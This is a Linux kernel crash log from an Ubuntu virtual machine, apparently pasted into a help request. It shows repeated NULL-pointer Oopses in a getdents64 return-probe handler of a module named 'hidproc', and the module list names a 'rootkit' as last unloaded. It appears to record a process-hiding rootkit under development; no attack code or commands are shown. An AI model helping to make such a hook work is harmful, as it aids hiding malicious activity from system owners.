RSP: 4520ff48:ffffa5594520fe78 EFLAGS: 00000246 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048684] RAX: 00000000000000d0 RBX: 0000000000000000 RCX: 0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048685] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8a8a1700 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048686] RBP: ffffa5594520fe78 R08: ffff8d5e152a0800 R09: ffff8d5e8c595cf8 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048688] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa5594520ff58 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048689] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048692] ? do_syscall_64+0x56/0xb0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048694] ? handle_mm_fault+0xd8/0x2c0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048698] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048700] ? do_user_addr_fault+0x1e7/0x670 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048702] ? __x64_sys_openat+0x55/0x90 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048707] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048709] ? exit_to_user_mode_prepare+0x37/0xb0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048717] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048718] ? irqentry_exit_to_user_mode+0x17/0x20 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048720] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048722] ? irqentry_exit+0x1d/0x30 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048723] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048725] ? exc_page_fault+0x89/0x170 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048727] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048732] </TASK> Jun 21 08:05:42 xubun2204 kernel: [ 1417.048734] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit] Jun 21 08:05:42 xubun2204 kernel: [ 1417.048796] CR2: 0000000000000018 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048798] ---[ end trace ed478a6b988e964c ]--- Jun 21 08:05:42 xubun2204 kernel: [ 1417.048799] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:42 xubun2204 kernel: [ 1417.048802] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048804] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048806] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048807] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048809] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048810] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048811] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048813] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048814] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048816] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048846] PKRU: 55555554 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141480] BUG: kernel NULL pointer dereference, address: 0000000000000018 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141485] #PF: supervisor read access in kernel mode Jun 21 08:05:43 xubun2204 kernel: [ 1417.141487] #PF: error_code(0x0000) - not-present page Jun 21 08:05:43 xubun2204 kernel: [ 1417.141489] PGD 0 P4D 0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141492] Oops: 0000 [#3] SMP NOPTI Jun 21 08:05:43 xubun2204 kernel: [ 1417.141494] CPU: 1 PID: 4836 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu Jun 21 08:05:43 xubun2204 kernel: [ 1417.141498] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141500] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:43 xubun2204 kernel: [ 1417.141506] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141508] RSP: 0018:ffffa559451ffcf0 EFLAGS: 00010246 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141510] RAX: 0000000000000000 RBX: 0000000000000032 RCX: 0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141512] RDX: 0000000000008000 RSI: 00003c34012dc030 RDI: ffff8d5ec33d0000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141513] RBP: ffffa559451ffd30 R08: 0000000000000000 R09: 0000000000000008 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141514] R10: 0000000000000246 R11: ffff8d5f35e78760 R12: ffff8d5ec33c8000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141516] R13: 0000000000008000 R14: 00000000000000c8 R15: 00000000000000c8 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141517] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141519] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141520] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141534] PKRU: 55555554 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141535] Call Trace: Jun 21 08:05:43 xubun2204 kernel: [ 1417.141537] <TASK> Jun 21 08:05:43 xubun2204 kernel: [ 1417.141538] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141542] ? show_trace_log_lvl+0x28e/0x2ea Jun 21 08:05:43 xubun2204 kernel: [ 1417.141546] ? show_trace_log_lvl+0x28e/0x2ea Jun 21 08:05:43 xubun2204 kernel: [ 1417.141550] ? __kretprobe_trampoline_handler+0xb4/0x140 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141554] ? show_regs.part.0+0x23/0x29 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141555] ? __die_body.cold+0x8/0xd Jun 21 08:05:43 xubun2204 kernel: [ 1417.141557] ? __die+0x2b/0x37 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141559] ? page_fault_oops+0x13b/0x170 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141563] ? do_user_addr_fault+0x321/0x670 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141566] ? exc_page_fault+0x77/0x170 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141569] ? asm_exc_page_fault+0x27/0x30 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141574] ? handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:43 xubun2204 kernel: [ 1417.141576] ? x64_sys_call+0xf63/0x1fa0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141580] __kretprobe_trampoline_handler+0xb4/0x140 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141582] trampoline_handler+0x41/0x60 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141585] __kretprobe_trampoline+0x2a/0x60 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141587] RIP: 0010:__kretprobe_trampoline+0x0/0x60 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141589] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141590] RSP: 451fff48:ffffa559451ffe38 EFLAGS: 00000246 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141592] RAX: 00000000000000c8 RBX: 0000000000000000 RCX: 0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141593] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8983a900 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141594] RBP: ffffa559451ffe38 R08: ffff8d5e152a0800 R09: ffff8d5e8c596628 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141596] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa559451fff58 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141600] ? do_syscall_64+0x56/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141603] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141605] ? exit_to_user_mode_prepare+0x37/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141608] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141610] ? syscall_exit_to_user_mode+0x35/0x50 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141612] ? x64_sys_call+0x1a81/0x1fa0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141614] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141615] ? do_syscall_64+0x63/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141617] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141619] ? __x64_sys_openat+0x55/0x90 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141622] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141624] ? exit_to_user_mode_prepare+0x37/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141626] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141628] ? syscall_exit_to_user_mode+0x35/0x50 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141629] ? x64_sys_call+0x1a55/0x1fa0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141631] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141633] ? do_syscall_64+0x63/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141635] ? do_syscall_64+0x63/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141637] ? x64_sys_call+0x1022/0x1fa0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141639] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:43 xubun2204 kernel: [ 1417.141640] ? do_syscall_64+0x63/0xb0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141643] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141646] </TASK> Jun 21 08:05:43 xubun2204 kernel: [ 1417.141648] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit] Jun 21 08:05:43 xubun2204 kernel: [ 1417.141704] CR2: 0000000000000018 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141706] ---[ end trace ed478a6b988e964d ]--- Jun 21 08:05:43 xubun2204 kernel: [ 1417.141707] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:43 xubun2204 kernel: [ 1417.141709] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141711] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141713] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141714] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141715] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141716] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141718] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141719] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141720] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141722] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141733] PKRU: 55555554 </code>
Jun 21 08:05:39 xubun2204 kernel: [ 1413.166586] audit: type=1400 audit(1718953539.095:66): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=12  capname="net_admin"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.166593] audit: type=1400 audit(1718953539.095:67): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=38  capname="perfmon"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] audit: type=1107 audit(1718953539.883:68): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call"  bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050]  exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] audit: type=1107 audit(1718953539.883:69): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call"  bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564]  exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048570] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048576] #PF: supervisor read access in kernel mode
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048578] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048580] PGD 0 P4D 0 
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048583] Oops: 0000 [#2] SMP NOPTI
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048585] CPU: 2 PID: 4837 Comm: code Tainted: G      D    OE     5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048588] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048590] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048596] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048598] RSP: 0018:ffffa5594520fd30 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048600] RAX: 0000000000000000 RBX: 0000000000000026 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048602] RDX: 0000000000008000 RSI: 00003c3400aec030 RDI: ffff8d5eb9660000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048603] RBP: ffffa5594520fd70 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048604] R10: 0000000000000246 R11: ffff8d5f35eb8760 R12: ffff8d5eb9658000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048606] R13: 0000000000008000 R14: 00000000000000d0 R15: 00000000000000d0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048607] FS:  00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048609] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048610] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048625] PKRU: 55555554
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048626] Call Trace:
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048628]  <TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048629]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048634]  ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048637]  ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048641]  ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048646]  ? show_regs.part.0+0x23/0x29
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048647]  ? __die_body.cold+0x8/0xd
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048649]  ? __die+0x2b/0x37
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048651]  ? page_fault_oops+0x13b/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048655]  ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048658]  ? exc_page_fault+0x77/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048661]  ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048666]  ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048669]  ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048672]  __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048675]  trampoline_handler+0x41/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048677]  __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048679] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048680] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048682] RSP: 4520ff48:ffffa5594520fe78 EFLAGS: 00000246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048684] RAX: 00000000000000d0 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048685] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8a8a1700
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048686] RBP: ffffa5594520fe78 R08: ffff8d5e152a0800 R09: ffff8d5e8c595cf8
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048688] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa5594520ff58
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048689] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048692]  ? do_syscall_64+0x56/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048694]  ? handle_mm_fault+0xd8/0x2c0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048698]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048700]  ? do_user_addr_fault+0x1e7/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048702]  ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048707]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048709]  ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048717]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048718]  ? irqentry_exit_to_user_mode+0x17/0x20
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048720]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048722]  ? irqentry_exit+0x1d/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048723]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048725]  ? exc_page_fault+0x89/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048727]  ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048732]  </TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048734] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048796] CR2: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048798] ---[ end trace ed478a6b988e964c ]---
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048799] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048802] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048804] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048806] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048807] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048809] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048810] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048811] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048813] FS:  00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048814] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048816] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048846] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141480] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141485] #PF: supervisor read access in kernel mode
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141487] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141489] PGD 0 P4D 0 
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141492] Oops: 0000 [#3] SMP NOPTI
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141494] CPU: 1 PID: 4836 Comm: code Tainted: G      D    OE     5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141498] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141500] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141506] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141508] RSP: 0018:ffffa559451ffcf0 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141510] RAX: 0000000000000000 RBX: 0000000000000032 RCX: 0000000000000000
